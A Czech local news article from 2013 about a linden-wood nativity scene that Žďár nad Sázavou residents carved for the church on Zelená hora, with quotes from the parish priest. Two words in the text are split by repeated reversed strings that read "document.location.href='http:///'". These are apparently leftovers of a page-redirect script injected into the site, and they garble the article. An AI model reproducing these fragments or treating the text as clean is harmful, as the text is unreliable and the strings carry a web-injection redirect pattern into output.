Žďár nad Sázavou, aktuality, vyřezáváný betlém
Rainbow page separator

Betlém vyřezaný obyvateli Žďáru je k vidění na Zelené hoře

Sobota, 28. prosince 2013

Vyřezávaný městský betlém Žďár nad Sázavou

Žďár nad Sázavou / Městskému betlému, který pro poutní kostel svatého Jana Nepomuckého na Zelené hoře v průběhu le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního adventu vyrobili obyvatelé Žďáru a blízkého okolí pod odborným dohledem řezbáře a betlemáře Zdeňka Berana ze Sázavy, bylo o prvním svátku vánočním slavnostně požehnáno.

Betlém z lipového dřeva coby společný výrobek řady lidí, kteří v sobě nezřídka objevili dosud skrytý talent, připomíná jejich nadšení, s nímž se do vyřezávání pustili.

Podle duchovního žďárské farnosti Nanebevzetí Panny Marie Vladimíra Záleského však dílo žďárských občanů není u konce.

„Někteří lidé třeba onemocněli, anebo se účastnit vyřezávání betlému z nějakých jiných důvodů nestihli, což je pak mrzelo. Chci říct, že nemusí být smutní, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože v práci na betlému můžeme pokračovat a do příštích Vánoc ho rozšířit o další postavičky. Lipového dřeva máme dost a díky grantu Kraje Vysočina i nářadí,“ uvedl Vladimír Záleský.